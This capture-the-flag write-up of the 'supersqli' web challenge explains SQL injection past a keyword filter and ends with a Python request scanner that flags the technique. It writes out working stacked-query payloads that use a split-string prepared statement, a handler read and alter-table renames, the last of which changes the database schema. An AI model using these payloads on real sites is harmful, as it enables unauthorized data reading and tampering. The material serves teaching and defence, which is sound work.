Attack and defense world (WEB) -- supersqli

2022-06-12 18:55:00 Xiao Xiaoran

After opening the challenge, a single quotation mark triggers an error, which shows that this is a string-type (quoted) injection

With order by 2 the page echoes normally; with order by 3 the page returns an error

Next, try a union query; it turns out that many statements are filtered

There are several ways to bypass the filter

Stacked queries + prepared statements

List the tables

List the columns

Querying with a prepared statement is filtered

strstr is case-sensitive, so the keywords are written in a different case

?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;

Querying with handler

handler syntax

Query payload

?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+ 

Stacked queries + renaming the table

How it works

The page's original query reads data from the words table, so we can use the database itself to change the table name and column name

First rename the original words table to something else, then rename the 1919810931114514 table to words

Then, in the renamed table, change the flag column to id (the column name id also has to be obtained with show columns from words)

After that, 1' or 1=1 --+ returns the flag directly

Rename payload

?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);
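
An added example (not from the original post or the challenge's source): a small request-scanning check showing why a case-sensitive substring blacklist lets the three payloads above through, while looking for a statement keyword after a `;` flags all of them. The blacklist words, the keyword list and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample requests: the three payloads from this write-up plus two benign values.
SAMPLES = [
    "/?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;",
    "/?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+ ",
    "/?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);",
    "/?inject=1",
    "/?inject=tea%3B%20coffee",
]
# Keywords that should never start a statement inside a request parameter (assumed list).
STATEMENT_KEYWORDS = {"select", "set", "prepare", "execute", "handler", "alter",
                      "show", "insert", "update", "delete", "drop", "rename"}
# Hypothetical blacklist standing in for a filter of the kind the write-up describes.
BLACKLIST = ("select", "prepare")

def param(url, name="inject"):
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return ""

def naive_filter_blocks(value):
    """Case-sensitive substring check, like PHP strstr(): True means blocked."""
    return any(word in value for word in BLACKLIST)

def stacked_statements(value):
    """Lower-cased leading keywords of statements that follow a ';' in the value."""
    found = []
    for segment in value.split(";")[1:]:
        # Skip leading whitespace and inline /* */ comments, then read the first word.
        match = re.match(r"\s*(?:/\*.*?\*/\s*)*([A-Za-z]+)", segment, re.S)
        if match and match.group(1).lower() in STATEMENT_KEYWORDS:
            found.append(match.group(1).lower())
    return found

def scan(urls):
    """Map each request to (blocked by naive filter, stacked statement keywords)."""
    return [(naive_filter_blocks(param(u)), stacked_statements(param(u))) for u in urls]

if __name__ == "__main__":
    for url, (blocked, stacked) in zip(SAMPLES, scan(SAMPLES)):
        print(f"naive_blocked={blocked!s:5} stacked={stacked} {url[:40]}")
```

A hit here is only a detection signal; on the application side the fix is to bind `inject` as a query parameter and run it through a single-statement query API.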


Copyright notice
This article was written by [Xiao Xiaoran]; please include the link to the original when reposting. Thank you.
https://yzsam.com/2022/163/202206121851113708.html